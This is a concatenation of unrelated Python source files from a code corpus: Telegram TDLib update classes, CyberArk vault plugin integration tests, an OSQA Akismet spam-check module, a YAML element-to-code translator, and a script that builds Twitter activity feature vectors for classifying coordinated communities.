class UpdateScopeNotificationSettings(Update):
"""
Notification settings for some type of chats were updated
:param scope: Types of chats for which notification settings were updated
:type scope: :class:`NotificationSettingsScope`
:param notification_settings: The new notification settings
:type notification_settings: :class:`ScopeNotificationSettings`
"""
ID: str = Field("updateScopeNotificationSettings", alias="@type")
scope: NotificationSettingsScope
notification_settings: ScopeNotificationSettings
@staticmethod
def read(q: dict) -> UpdateScopeNotificationSettings:
return UpdateScopeNotificationSettings.construct(**q)
class UpdateSecretChat(Update):
"""
Some data of a secret chat has changed. This update is guaranteed to come before the secret chat identifier is returned to the application
:param secret_chat: New data about the secret chat
:type secret_chat: :class:`SecretChat`
"""
ID: str = Field("updateSecretChat", alias="@type")
secret_chat: SecretChat
@staticmethod
def read(q: dict) -> UpdateSecretChat:
return UpdateSecretChat.construct(**q)
class UpdateSelectedBackground(Update):
"""
The selected background has changed
:param for_dark_theme: True, if background for dark theme has changed
:type for_dark_theme: :class:`bool`
:param background: The new selected background; may be null, defaults to None
:type background: :class:`Background`, optional
"""
ID: str = Field("updateSelectedBackground", alias="@type")
for_dark_theme: bool
background: typing.Optional[Background] = None
@staticmethod
def read(q: dict) -> UpdateSelectedBackground:
return UpdateSelectedBackground.construct(**q)
class UpdateServiceNotification(Update):
"""
A service notification from the server was received. Upon receiving this the application must show a popup with the content of the notification
:param type_: Notification type. If type begins with "AUTH_KEY_DROP_", then two buttons "Cancel" and "Log out" must be shown under notification; if user presses the second, all local data must be destroyed using Destroy method
:type type_: :class:`str`
:param content: Notification content
:type content: :class:`MessageContent`
"""
ID: str = Field("updateServiceNotification", alias="@type")
type_: str = Field(..., alias='type')
content: MessageContent
@staticmethod
def read(q: dict) -> UpdateServiceNotification:
return UpdateServiceNotification.construct(**q)
class UpdateStickerSet(Update):
"""
A sticker set has changed
:param sticker_set: The sticker set
:type sticker_set: :class:`StickerSet`
"""
ID: str = Field("updateStickerSet", alias="@type")
sticker_set: StickerSet
@staticmethod
def read(q: dict) -> UpdateStickerSet:
return UpdateStickerSet.construct(**q)
class UpdateSuggestedActions(Update):
"""
The list of suggested to the user actions has changed
:param added_actions: Added suggested actions
:type added_actions: :class:`list[SuggestedAction]`
:param removed_actions: Removed suggested actions
:type removed_actions: :class:`list[SuggestedAction]`
"""
ID: str = Field("updateSuggestedActions", alias="@type")
added_actions: list[SuggestedAction]
removed_actions: list[SuggestedAction]
@staticmethod
def read(q: dict) -> UpdateSuggestedActions:
return UpdateSuggestedActions.construct(**q)
class UpdateSupergroup(Update):
"""
Some data of a supergroup or a channel has changed. This update is guaranteed to come before the supergroup identifier is returned to the application
:param supergroup: New data about the supergroup
:type supergroup: :class:`Supergroup`
"""
ID: str = Field("updateSupergroup", alias="@type")
supergroup: Supergroup
@staticmethod
def read(q: dict) -> UpdateSupergroup:
return UpdateSupergroup.construct(**q)
class UpdateSupergroupFullInfo(Update):
"""
Some data in supergroupFullInfo has been changed
:param supergroup_id: Identifier of the supergroup or channel
:type supergroup_id: :class:`int`
:param supergroup_full_info: New full information about the supergroup
:type supergroup_full_info: :class:`SupergroupFullInfo`
"""
ID: str = Field("updateSupergroupFullInfo", alias="@type")
supergroup_id: int
supergroup_full_info: SupergroupFullInfo
@staticmethod
def read(q: dict) -> UpdateSupergroupFullInfo:
return UpdateSupergroupFullInfo.construct(**q)
class UpdateTermsOfService(Update):
"""
New terms of service must be accepted by the user. If the terms of service are declined, then the deleteAccount method must be called with the reason "Decline ToS update"
:param terms_of_service_id: Identifier of the terms of service
:type terms_of_service_id: :class:`str`
:param terms_of_service: The new terms of service
:type terms_of_service: :class:`TermsOfService`
"""
ID: str = Field("updateTermsOfService", alias="@type")
terms_of_service_id: str
terms_of_service: TermsOfService
@staticmethod
def read(q: dict) -> UpdateTermsOfService:
return UpdateTermsOfService.construct(**q)
class UpdateTrendingStickerSets(Update):
"""
The list of trending sticker sets was updated or some of them were viewed
:param sticker_sets: The prefix of the list of trending sticker sets with the newest trending sticker sets
:type sticker_sets: :class:`StickerSets`
"""
ID: str = Field("updateTrendingStickerSets", alias="@type")
sticker_sets: StickerSets
@staticmethod
def read(q: dict) -> UpdateTrendingStickerSets:
return UpdateTrendingStickerSets.construct(**q)
class UpdateUnreadChatCount(Update):
"""
Number of unread chats, i.e. with unread messages or marked as unread, has changed. This update is sent only if the message database is used
:param chat_list: The chat list with changed number of unread messages
:type chat_list: :class:`ChatList`
:param total_count: Approximate total number of chats in the chat list
:type total_count: :class:`int`
:param unread_count: Total number of unread chats
:type unread_count: :class:`int`
:param unread_unmuted_count: Total number of unread unmuted chats
:type unread_unmuted_count: :class:`int`
:param marked_as_unread_count: Total number of chats marked as unread
:type marked_as_unread_count: :class:`int`
:param marked_as_unread_unmuted_count: Total number of unmuted chats marked as unread
:type marked_as_unread_unmuted_count: :class:`int`
"""
ID: str = Field("updateUnreadChatCount", alias="@type")
chat_list: ChatList
total_count: int
unread_count: int
unread_unmuted_count: int
marked_as_unread_count: int
marked_as_unread_unmuted_count: int
@staticmethod
def read(q: dict) -> UpdateUnreadChatCount:
return UpdateUnreadChatCount.construct(**q)
class UpdateUnreadMessageCount(Update):
"""
Number of unread messages in a chat list has changed. This update is sent only if the message database is used
:param chat_list: The chat list with changed number of unread messages
:type chat_list: :class:`ChatList`
:param unread_count: Total number of unread messages
:type unread_count: :class:`int`
:param unread_unmuted_count: Total number of unread messages in unmuted chats
:type unread_unmuted_count: :class:`int`
"""
ID: str = Field("updateUnreadMessageCount", alias="@type")
chat_list: ChatList
unread_count: int
unread_unmuted_count: int
@staticmethod
def read(q: dict) -> UpdateUnreadMessageCount:
return UpdateUnreadMessageCount.construct(**q)
class UpdateUser(Update):
"""
Some data of a user has changed. This update is guaranteed to come before the user identifier is returned to the application
:param user: New data about the user
:type user: :class:`User`
"""
ID: str = Field("updateUser", alias="@type")
user: User
@staticmethod
def read(q: dict) -> UpdateUser:
return UpdateUser.construct(**q)
class UpdateUserFullInfo(Update):
"""
Some data in userFullInfo has been changed
:param user_id: User identifier
:type user_id: :class:`int`
:param user_full_info: New full information about the user
:type user_full_info: :class:`UserFullInfo`
"""
ID: str = Field("updateUserFullInfo", alias="@type")
user_id: int
user_full_info: UserFullInfo
@staticmethod
def read(q: dict) -> UpdateUserFullInfo:
return UpdateUserFullInfo.construct(**q)
class UpdateUserPrivacySettingRules(Update):
"""
Some privacy setting rules have been changed
:param setting: The privacy setting
:type setting: :class:`UserPrivacySetting`
:param rules: New privacy rules
:type rules: :class:`UserPrivacySettingRules`
"""
ID: str = Field("updateUserPrivacySettingRules", alias="@type")
setting: UserPrivacySetting
rules: UserPrivacySettingRules
@staticmethod
def read(q: dict) -> UpdateUserPrivacySettingRules:
return UpdateUserPrivacySettingRules.construct(**q)
class UpdateUserStatus(Update):
"""
The user went online or offline
:param user_id: User identifier
:type user_id: :class:`int`
:param status: New status of the user
:type status: :class:`UserStatus`
"""
ID: str = Field("updateUserStatus", alias="@type")
user_id: int
status: UserStatus
@staticmethod
def read(q: dict) -> UpdateUserStatus:
return UpdateUserStatus.construct(**q)
class UpdateUsersNearby(Update):
"""
The list of users nearby has changed. The update is guaranteed to be sent only 60 seconds after a successful searchChatsNearby request
:param users_nearby: The new list of users nearby
:type users_nearby: :class:`list[ChatNearby]`
"""
ID: str = Field("updateUsersNearby", alias="@type")
users_nearby: list[ChatNearby]
@staticmethod
def read(q: dict) -> UpdateUsersNearby:
return UpdateUsersNearby.construct(**q)
| 1.351563 | 1 |
lib/tests/test_integration.py | OneIdentity/safeguard-sessions-plugin-cyberark-vault | 0 | 17678 | <reponame>OneIdentity/safeguard-sessions-plugin-cyberark-vault
#
# Copyright (c) 2019 One Identity
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import pytest
from textwrap import dedent
from ..plugin import Plugin
from safeguard.sessions.plugin_impl.test_utils.plugin import assert_plugin_hook_result
def test_cyberark_integration_getting_password(cy_config, cy_account, cy_asset, cy_account_password, connection_parameters):
plugin = Plugin(cy_config)
result = plugin.get_password_list(
**connection_parameters(server_uname=cy_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"passwords": [cy_account_password]})
def test_cyberark_integration_getting_password_for_wrong_user(cy_config, cy_wrong_account, cy_asset, connection_parameters):
plugin = Plugin(cy_config)
result = plugin.get_password_list(
**connection_parameters(server_uname=cy_wrong_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"passwords": []})
def test_cyberark_integration_getting_private_key(cy_config, cy_account_with_key, cy_asset, cy_account_private_key, connection_parameters):
plugin = Plugin(cy_config)
result = plugin.get_private_key_list(
**connection_parameters(server_uname=cy_account_with_key, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"private_keys": [("ssh-rsa", cy_account_private_key)]})
def test_cyberark_integration_getting_private_key_for_wrong_account(cy_config, cy_wrong_account, cy_asset, connection_parameters):
plugin = Plugin(cy_config)
result = plugin.get_private_key_list(
**connection_parameters(server_uname=cy_wrong_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"private_keys": []})
def test_v10_user_logon(cy_config, cy_account, cy_asset, cy_account_password, connection_parameters):
config = cy_config + "\nauthentication_method=cyberark"
plugin = Plugin(config)
result = plugin.get_password_list(
**connection_parameters(server_uname=cy_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"passwords": [cy_account_password]})
@pytest.mark.skip(reason="I don't know how this was tested before, cannot see settings on our CArk")
def test_v10_ldap_logon(
cy_address,
cy_ldap_username,
cy_ldap_password,
cy_account,
cy_asset,
cy_account_password,
connection_parameters
):
config = dedent(
"""
[cyberark]
address={}
use_credential=explicit
username={}
password={}
authentication_method=ldap
""".format(
cy_address, cy_ldap_username, cy_ldap_password
)
)
plugin = Plugin(config)
result = plugin.get_password_list(
**connection_parameters(server_uname=cy_account, server_ip=cy_asset)
)
assert_plugin_hook_result(result, {"passwords": [<PASSWORD>]})
| 1.554688 | 2 |
forum_modules/akismet/startup.py | Stackato-Apps/osqa | 1 | 17679 | import json
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from django.utils.encoding import smart_str
from django.shortcuts import render_to_response
from forum.modules import decorate
from forum import views
from lib.akismet import Akismet
from forum.settings import APP_URL, OSQA_VERSION
from settings import WORDPRESS_API_KEY, REP_FOR_NO_SPAM_CHECK
from forum.models.user import User
from forum.forms.general import SimpleCaptchaForm
import settings
def can_bypass_spam_check(user):
return user.is_authenticated and (user.is_superuser or user.is_staff or cmp(int(user.reputation), REP_FOR_NO_SPAM_CHECK) > 0)
def check_spam(param, comment_type):
def wrapper(origin, request, *args, **kwargs):
if request.POST and request.POST.get(param, None) and WORDPRESS_API_KEY and (not can_bypass_spam_check(request.user)):
comment = smart_str(request.POST[param])
data = {
"user_ip":request.META["REMOTE_ADDR"],
"user_agent":request.environ['HTTP_USER_AGENT'],
"comment_type": comment_type,
"comment":comment
}
if request.user.is_authenticated():
data.update({
"comment_author":smart_str(request.user.username),
"comment_author_email":request.user.email,
"comment_author_url":request.user.website,
})
api = Akismet(settings.WORDPRESS_API_KEY, APP_URL, "OSQA/%s" % OSQA_VERSION)
if api.comment_check(comment, data):
post_data = request.POST
captcha_form = SimpleCaptchaForm(request.POST)
if request.is_ajax():
response = {
'success': False,
'error_message': _("Sorry, but akismet thinks your %s is spam.") % comment_type
}
return HttpResponse(json.dumps(response), mimetype="application/json")
else:
captcha_checked = False
try:
if captcha_form.is_valid() and 'recaptcha' in captcha_form.fields.keys():
captcha_checked = True
except:
pass
if not captcha_checked:
return render_to_response('modules/akismet/foundspam.html', {
'action_name': comment_type,
'post_data' : post_data,
'captcha_form' : captcha_form,
}, RequestContext(request))
return origin(request, *args, **kwargs)
return wrapper
decorate(views.writers.ask)(check_spam('text', _('question')))
decorate(views.writers.answer)(check_spam('text', _('answer')))
decorate(views.commands.comment)(check_spam('comment', _('comment')))
| 2.015625 | 2 |
prototype/python/element_translator.py | doanminhdang/YAML_MATH | 1 | 17680 | """
Translate an element, which is described by the YAML method file
and a descriptor file, into a target function.
Procedure:
1. When analyzing a YAML file, parse the call to the method-element, to get:
- list of inputs,
- list of outputs
2. Parse the YAML of that element, to know the name of the inputs and outputs,
create inputs and outputs with such names, value are translated-names (string,
given by the name-allocator before translating methods), they will be accessed
in the descriptor of that element.
3. Process the descriptor:
- If preprocess part is available: execute the preprocess part as Python 3 code.
- Treat the code part as text (a string), parse that text to detect:
anywhere there is the structure <var_name>, then replace it with the value
of that variable currently in Python memory (within scope of processing that
specific descriptor). The new text after processing the code part is named code.
- If postprocess part is available: execute the postprocess part as Python 3
code. By requirement, at the end of postprocess part, there will be a variables
named `code`. Write the value of `code` into the output string.
"""
import re
from . import descriptor_parser
from . import utils
from .shared_parameters import *
# def descriptor_file_parse(descriptor_file, method_file):
# descriptor = descriptor_file_read(descriptor_file)
# yaml_method = yaml_method_file_read(method_file)
# preprocess_parse(descriptor_file)
def yaml_single_method_file_read(yaml_method_file):
"""
Read a method file which contains only one block
"""
yaml_block = utils.yaml_file_read(yaml_method_file)
# Analyze its commands
return
def translate_command_element(odict_command, element_file, descriptor_file):
descriptor = descriptor_parser.descriptor_file_read(descriptor_file)
preprocess_string = descriptor['preprocess']
code_string = descriptor['code']
postprocess_string = descriptor['postprocess']
yaml_element = utils.yaml_file_read(element_file)
list_command_keys = [key for key in odict_command.keys()]
first_key = list_command_keys[0]
input_names = odict_command[first_key]
output_name = utils.get_var_name_from_bank(1)
list_element_keys = [key for key in yaml_element.keys()]
element_name = list_element_keys[0]
element_inputs = yaml_element[element_name]['inputs']
element_output = yaml_element[element_name]['outputs']
if not element_name.startswith(first_key): # overloading: add__float for add
raise ValueError('Element does not match command.')
else:
real_inputs = analyze_inputs(input_names, element_inputs)
real_output = analyze_outputs(output_name, element_output)
translated_code = translate_single_code(real_inputs, real_output,\
preprocess_string, code_string, postprocess_string)
return translated_code
def analyze_inputs(input_names, element_inputs):
"""
Get decoded names from the input_names (list) and the template
element_inputs (odict).
The output is a dict, with keys from element_inputs and values are picked
with corresponding order from input_names.
If element_inputs contains both 'name' and 'array_name', then array_name
must be the last item. This function automatically assign the rest of the
input names into an array, if 'array_name' is found in element_inputs.
"""
real_inputs = {}
index_input_names = 0
for item in element_inputs:
# item == OrderedDict([('array_name', 'input_'), ('length', ''), ('type', 'float')])
if 'name' in item:
real_inputs.update({item['name']: input_names[index_input_names]})
index_input_names += 1
elif 'array_name' in item:
names_left = input_names[index_input_names:]
array_length = len(names_left)
real_inputs.update({item['array_name']: names_left})
# for k in range(array_length):
# real_inputs.update({item['array_name'] + '[' + str(k) + ']': names_left[k]})
return real_inputs
def analyze_outputs(output_name, element_output):
output_var = element_output[0]['name']
output_dict = {output_var: output_name[0]}
return output_dict
def parse_code(code_string):
"""
Parse the multi-line string which contains the code, pick variable in <>.
Output: list of segments, each is a dict with key `text` or `var`,
and value is the text or the variable name.
"""
code = []
var_pattern = r'\<[\w\[\]]+\>'
rolling_code = code_string
while re.search(var_pattern, rolling_code):
start_index = re.search(var_pattern, rolling_code).start()
var_group = re.search(var_pattern, rolling_code).group()
var_name = var_group.strip('<>')
if start_index > 0:
text_before = rolling_code[0:start_index]
code.append({'text': text_before})
code.append({'var': var_name})
rolling_code = rolling_code[start_index+len(var_group):]
return code
def translate_single_code(input_dict, output_dict, preprocess_string,\
code_string, postprocess_string):
"""
input_dict == {'input_': ['A_1', 'A_2', 'A_3']}
output_dict == {'output': 'Alpha'}
parsed_code == [{'var': 'output'}, {'text': ' := '}, {'var': 'command_text'}]
"""
_code_series = parse_code(code_string)
print('preprocess:')
print(preprocess_string)
print('code:')
print(code_string)
print('postprocess:')
print(postprocess_string)
for _key in input_dict:
if isinstance(input_dict[_key], list):
# it is an array
_assign_code = _key + '=' + '['
for _item in input_dict[_key]:
_assign_code += '\'' + _item + '\','
_assign_code = _assign_code[:-1]+']' # remove the last comma
else:
_assign_code = _key + '=' + '\'' + input_dict[_key] + '\''
exec(_assign_code)
for _key in output_dict:
_assign_code = _key + '=' + '\'' + output_dict[_key] + '\''
exec(_assign_code)
exec(preprocess_string)
# 1st round: substitute variable names in code string
_1st_processed_code = ''
for _chunk in _code_series:
if 'text' in _chunk:
_1st_processed_code += _chunk['text']
if 'var' in _chunk:
_1st_processed_code += eval(_chunk['var'])
#2nd round: replace variable names left, which might come from preprocess,
# like: input_[0]
_parsed_2nd_code = parse_code(_1st_processed_code)
code = ''
for _chunk in _parsed_2nd_code:
if 'text' in _chunk:
code += _chunk['text']
if 'var' in _chunk:
code += eval(_chunk['var'])
# Preset output code, in case postprocess part is empty
exec(output_code_descriptor + ' = code')
# BUG: if output_code_descriptor is 'code', there is a Python bug that
# variable code is not updated after the next exec
exec(postprocess_string)
final_processed_code = eval(output_code_descriptor)
return final_processed_code
| 3.953125 | 4 |
build_feature_vectors_32.py | weberdc/find_hccs | 7 | 17681 | #!/usr/bin/env python3
import csv
import gzip
import json
import networkx as nx
import sys
import time
import utils
from argparse import ArgumentParser
from calculate_activity_network import embedded_extended_tweet_url, root_of_conversation
from collections import defaultdict
from datetime import datetime
from utils import eprint, expanded_urls_from, extract_text, flatten, lowered_hashtags_from, mentioned_ids_from#, timestamp_2_epoch_seconds
# Builds feature vectors for HCC members and their groupings as input to the
# classifiers for validation
#
# This version extracts 32 features
#
# Renamed from extract_feature_vectors_for_hcc_classifier.py
class Options():
    """Command-line interface for the feature vector builder."""

    def __init__(self):
        self._init_parser()

    def _init_parser(self):
        """Construct the ArgumentParser with this script's options."""
        # NOTE: keep the script name here in sync with the actual filename
        # (renamed from extract_feature_vectors_for_hcc_classifier.py).
        usage = 'build_feature_vectors_32.py -t <tweets.json> -i <ids.csv> -l <label>'
        self.parser = ArgumentParser(usage=usage,conflict_handler='resolve')
        self.parser.add_argument(
            '-t', '--tweets',
            required=True,
            dest='tweets_file',
            help='File containing all the tweets'
        )
        self.parser.add_argument(
            '-i', '--ids-file',
            required=True,
            dest='ids_file',
            help='The list of IDs to build feature vectors for.'
        )
        self.parser.add_argument(
            '-l', '--label',
            required=True,
            dest='label',
            help='The label to apply to each entry in the data generated (first column).'
        )
        self.parser.add_argument(
            '-v', '--verbose',
            action='store_true',
            default=False,
            dest='verbose',
            help='Turn on verbose logging (default: False)'
        )

    def parse(self, args=None):
        """Parse args (or sys.argv when None) and return the options namespace."""
        return self.parser.parse_args(args)
# Twitter's timestamp layout, e.g. "Tue Apr 26 08:57:55 +0000 2011".
TWITTER_TS_FORMAT = '%a %b %d %H:%M:%S +0000 %Y' # Tue Apr 26 08:57:55 +0000 2011

def parse_ts(ts_str):
    """Parse a Twitter-style timestamp string into a datetime object."""
    return datetime.fromtimestamp(time.mktime(time.strptime(ts_str, TWITTER_TS_FORMAT)))
def count(fltr): return len(list(fltr))
def root_of_conversation(tweet_in_conversation, tweet_map):
    """Walk a reply chain upwards and return the ID of the conversation root.

    Stops as soon as the current tweet is outside the corpus or is not a
    reply; the returned ID may therefore refer to a tweet not in tweet_map.
    """
    current_id = tweet_in_conversation
    while True:
        tweet = tweet_map.get(current_id)
        if tweet is None:
            return current_id
        parent_id = tweet.get('in_reply_to_status_id_str')
        if not parent_id:
            return current_id
        current_id = parent_id
def embedded_extended_tweet_url(tweet_id, url):
    """True iff url is the tweet's own self-referential "extended tweet" link.

    Extended tweets, whose text field is too short for their content, embed a
    URL pointing back at the full tweet. Such URLs are not content we care
    about, so this predicate lets callers strip them out.
    """
    self_url = 'https://twitter.com/i/web/status/%s' % tweet_id
    return url == self_url
# Column order for the per-user portion of each feature vector; the names must
# match the keys returned by build_user_feature_vector().
USER_FEATURES = [
    'U_tweet_count',
    'U_retweet_count',
    'U_reply_count',
    'U_tweet_rate',
    'U_mentioned_ids', # unique IDs
    'U_mention_count', # every mention
    'U_unique_hts', # unique hashtags
    'U_ht_count', # every hashtag
    'U_unique_urls', # unique URLs
    'U_url_count', # every URL
    'U_default_img',
    'U_desc_len',
    'U_url'
]

# Twitter's stock avatar URL; accounts that never set a profile image keep it.
DEFAULT_PROF_IMG_URL = 'http://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png'
def build_user_feature_vector(u_id, activity, collection_period_mins):
    """Build the per-user feature map for one account.

    :param u_id: the user's ID string (kept for interface symmetry; unused)
    :param activity: the user's tweets in this corpus, as parsed tweet dicts
    :param collection_period_mins: length of the collection window in minutes
    :return: dict keyed by the names in USER_FEATURES
    """
    if not activity:
        # A user listed in the IDs file with no tweets in the corpus:
        # return an all-zero vector instead of crashing on activity[0].
        return {k: 0 for k in USER_FEATURES}
    profile = activity[0]['user']
    # Extract each entity list once, instead of once for the unique count
    # and again for the raw count.
    mentions = list(flatten(map(mentioned_ids_from, activity)))
    hashtags = list(flatten(map(lowered_hashtags_from, activity)))
    urls = list(flatten(map(expanded_urls_from, activity)))
    return {
        'U_tweet_count'   : len(activity),
        'U_retweet_count' : count(filter(lambda t: 'retweeted_status' in t and t['retweeted_status'], activity)),
        'U_reply_count'   : count(filter(lambda t: t['in_reply_to_status_id_str'], activity)),
        # Guard against a degenerate zero-length collection window.
        'U_tweet_rate'    : len(activity) / collection_period_mins if collection_period_mins else 0,
        'U_mentioned_ids' : len(set(mentions)), # unique mentioned IDs
        'U_mention_count' : len(mentions),      # every mention
        'U_unique_hts'    : len(set(hashtags)), # unique hashtags
        'U_ht_count'      : len(hashtags),      # every hashtag
        'U_unique_urls'   : len(set(urls)),     # unique URLs
        'U_url_count'     : len(urls),          # every URL
        'U_default_img'   : 1 if profile['profile_image_url'] == DEFAULT_PROF_IMG_URL else 0,
        'U_desc_len'      : len(profile['description'] if profile['description'] else ''),
        'U_url'           : len(profile['url'] if profile['url'] else ''),
    }
# Column order for the per-community portion of each feature vector; the names
# must match the keys returned by build_community_feature_vector().
COMMUNITY_FEATURES = [
    'C_tweet_count',
    'C_node_count',
    'C_edge_count',
    'C_user_count',
    'C_author_count',
    'C_hashtag_count',
    'C_url_count',
    'C_repost_count',
    'C_quote_count',
    'C_mention_count',
    'C_reply_count',
    'C_use_ht_count',
    'C_use_url_count',
    'C_in_conv_count',
    'C_in/ext_repost',  # fraction of reposts targeting community members
    'C_in/ext_mention', # fraction of mentions targeting community members
    'C_in/ext_reply',   # fraction of replies targeting community members
]
def build_community_feature_vector(community, g):
    """Build the per-community feature map from the community's activity graph.

    :param community: member user IDs (membership is also encoded in the
        graph via each node's 'is_author' attribute)
    :param g: activity graph (networkx MultiDiGraph) from build_activity_graph()
    :return: dict keyed by the names in COMMUNITY_FEATURES
    """
    def count_nodes_if(cond):
        # Number of nodes whose (id, data) pair satisfies cond.
        return len([n for n, d in g.nodes(data=True) if cond(n, d)])

    def count_edges_if(cond):
        # Number of edges whose (u, v, key, data) tuple satisfies cond.
        return len([k for u, v, k, d in g.edges(data=True, keys=True) if cond(u, v, k, d)])

    # Accounts inside the community (authors); interactions aimed at them are
    # 'internal'. A set gives O(1) membership tests in the lambdas below.
    int_users = {n for n, d in g.nodes(data=True) if d['is_author']}
    repost_count = count_edges_if(lambda u, v, k, d: d['interaction'] == 'REPOST')
    reply_count = count_edges_if(lambda u, v, k, d: d['interaction'] == 'REPLY')
    mention_count = count_edges_if(lambda u, v, k, d: d['interaction'] == 'MENTION')
    return {
        'C_tweet_count'    : g.graph['post_count'],
        'C_node_count'     : len(g),
        'C_edge_count'     : len(g.edges()),
        'C_user_count'     : count_nodes_if(lambda n, d: d['n_type'] == 'USER'),
        'C_author_count'   : count_nodes_if(lambda n, d: d['n_type'] == 'USER' and d['is_author']),
        'C_hashtag_count'  : count_nodes_if(lambda n, d: d['n_type'] == 'HASHTAG'),
        'C_url_count'      : count_nodes_if(lambda n, d: d['n_type'] == 'URL'),
        'C_repost_count'   : repost_count,
        'C_quote_count'    : count_edges_if(lambda u, v, k, d: d['interaction'] == 'QUOTE'),
        'C_mention_count'  : mention_count,
        'C_reply_count'    : reply_count,
        'C_use_ht_count'   : count_edges_if(lambda u, v, k, d: d['interaction'] == 'HASHTAG'),
        'C_use_url_count'  : count_edges_if(lambda u, v, k, d: d['interaction'] == 'URL'),
        'C_in_conv_count'  : count_edges_if(lambda u, v, k, d: d['interaction'] == 'IN_CONVERSATION'),
        # Proportion of each interaction type that targets community members;
        # zero when the community produced none of that interaction at all.
        'C_in/ext_repost'  : count_edges_if(lambda u, v, k, d: d['interaction'] == 'REPOST' and v in int_users) / repost_count if repost_count else 0,
        'C_in/ext_mention' : count_edges_if(lambda u, v, k, d: d['interaction'] == 'MENTION' and v in int_users) / mention_count if mention_count else 0,
        'C_in/ext_reply'   : count_edges_if(lambda u, v, k, d: d['interaction'] == 'REPLY' and v in int_users) / reply_count if reply_count else 0
    }
def mk_feature_str(keys, feature_map):
    """Render feature_map's values, in keys order, as one comma-separated string."""
    return ','.join(str(feature_map[k]) for k in keys)
def build_activity_graph(tweets, t_0): # tweets is a tweet map { tweet_id : tweet }
    """Build a multi-edge activity graph from a community's tweets.

    Nodes represent users, hashtags and URLs; each edge records a single
    interaction (HASHTAG, URL, MENTION, REPOST, QUOTE, REPLY or
    IN_CONVERSATION) carrying a 'time_t' offset in seconds relative to t_0.

    :param tweets: map of tweet ID (str) -> parsed tweet dict
    :param t_0: epoch seconds of the earliest tweet in the collection
    :return: networkx MultiDiGraph with a 'post_count' graph attribute
    """
    first_tweet_ts_str = utils.ts_to_str(t_0, fmt=utils.TWITTER_TS_FORMAT) # epoch_seconds_2_timestamp_str(t_0)
    first_tweet_ts = utils.epoch_seconds_2_ts(t_0) #first_tweet_ts_str) # parse_twitter_ts(first_tweet_ts_str)
    g = nx.MultiDiGraph(post_count=len(tweets))
    def add_node(g, n_id, n_type='USER', is_author=False):
        # Add n_id if new; an existing node can only be promoted to author.
        if n_id not in g:
            g.add_node(n_id, n_type=n_type, label=n_id, is_author=is_author)
        elif is_author:
            # g.nodes[n_id]['n_type'] = n_type
            g.nodes[n_id]['is_author'] = is_author
    def node_type_for(interaction):
        # HASHTAG/URL edges point at entity nodes; all other edges at users.
        if interaction == 'HASHTAG' or interaction == 'URL':
            return interaction
        else:
            return 'USER'
    def add_edge(g, from_id, to_id, tweet_id, ts_str, int_type, **kwargs):
        # The edge source is always the posting user, hence an author node.
        add_node(g, from_id, 'USER', True)
        # g.nodes[from_id]['is_author'] = True
        add_node(g, to_id, n_type=node_type_for(int_type))
        # Edge timestamps are stored as offsets from the collection start.
        t = utils.extract_ts_s(ts_str) - t_0 # timestamp_2_epoch_seconds(utils.extract_ts_s(ts_str)) - t_0
        attrs = {
            'time_t' : t,
            'tweet_id' : tweet_id,
            'interaction' : int_type
        }
        # Human-readable key keeps parallel edges distinct in the multigraph.
        key = '%s %s %s in %s' % (from_id, int_type, to_id, tweet_id)
        g.add_edge(from_id, to_id, key=key, **{**attrs, **kwargs})
    # Build networks
    # edge types: REPOST, MENTION, REPLY, QUOTE, URL, HASHTAG
    observed_user_ids = set()
    for tweet_id in tweets:
        tweet = tweets[tweet_id]
        hashtags = lowered_hashtags_from(tweet)
        urls = expanded_urls_from(tweet)
        mentions = mentioned_ids_from(tweet)
        tweet_text = extract_text(tweet)  # NOTE(review): appears unused here
        tweet_ts = tweet['created_at']
        tweet_id = tweet['id_str']
        tweeter_id = tweet['user']['id_str']
        observed_user_ids.add(tweeter_id)
        for ht in hashtags:
            add_edge(g, tweeter_id, ht, tweet_id, tweet_ts, 'HASHTAG')
        for url in urls:
            if not embedded_extended_tweet_url(tweet_id, url): # extended tweets include a URL to their extended form
                add_edge(g, tweeter_id, url, tweet_id, tweet_ts, 'URL')
        for mentioned_id in mentions:
            observed_user_ids.add(mentioned_id)
            add_edge(g, tweeter_id, mentioned_id, tweet_id, tweet_ts, 'MENTION')
        if 'retweeted_status' in tweet:
            # Retweet: REPOST edge from the retweeter to the original author.
            retweeter = tweeter_id
            retweetee = tweet['retweeted_status']['user']['id_str']
            observed_user_ids.add(retweetee)
            add_edge(
                g, retweeter, retweetee, tweet_id, tweet_ts, 'REPOST',
                original_tweet_id=tweet['retweeted_status']['id_str'],
                original_tweet_ts=tweet['retweeted_status']['created_at'],
                posting_delay_sec=(
                    utils.extract_ts_s(tweet['retweeted_status']['created_at']) -
                    utils.extract_ts_s(tweet_ts)
                )#.total_seconds()
            )
        elif 'quoted_status' in tweet and 'retweeted_status' not in tweet:
            # Pure quote tweet (retweets of quotes were handled above).
            quoter = tweeter_id
            quotee = tweet['quoted_status']['user']['id_str']
            observed_user_ids.add(quotee)
            add_edge(
                g, quoter, quotee, tweet_id, tweet_ts, 'QUOTE',
                original_tweet_id=tweet['quoted_status']['id_str'],
                original_tweet_ts=tweet['quoted_status']['created_at'],
                posting_delay_sec=(
                    utils.extract_ts_s(tweet['quoted_status']['created_at']) -
                    utils.extract_ts_s(tweet_ts)
                )#.total_seconds()
            )
